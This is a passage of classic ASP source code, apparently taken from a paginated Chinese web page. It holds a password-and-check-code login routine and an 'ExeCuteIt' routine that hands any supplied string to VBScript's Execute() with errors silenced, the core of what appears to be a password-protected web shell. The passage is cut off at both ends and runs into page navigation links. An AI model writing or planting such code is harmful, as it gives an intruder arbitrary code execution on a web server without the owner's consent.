p; <% End SUB
function checkPass() dim UserName,Runpassword,GetCode dim errinfo checkPass="" UserName=trim(request.form("UserName")) Runpassword=trim(request.form("Runpassword")) GetCode=request.form("GetCode") if UserName="" or Runpassword="" then errinfo=errinfo&"<li>用户名和密码输入不能为空" end if if Not isnumeric(GetCode) then errinfo=errinfo&"<li>请输入数字校验码" end if if errinfo<>"" then call loginmain() EndProc errinfo end if if action="chkpass" and Session("GetCode")=int(GetCode) and UserName=SUserName and Runpassword=Spassword then Session("GetCode")=0 checkPass="1" else call loginmain() EndProc "登陆失败!请重新确认正确输入" end if End function
SUB ExeCuteIt(ExString) on error resume next Execute(ExString) if err.number<>0 then Response.write "<div style=""background-color: #ffeedd;padding: 6px;"">" 上一页 [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] ... 下一页 >> |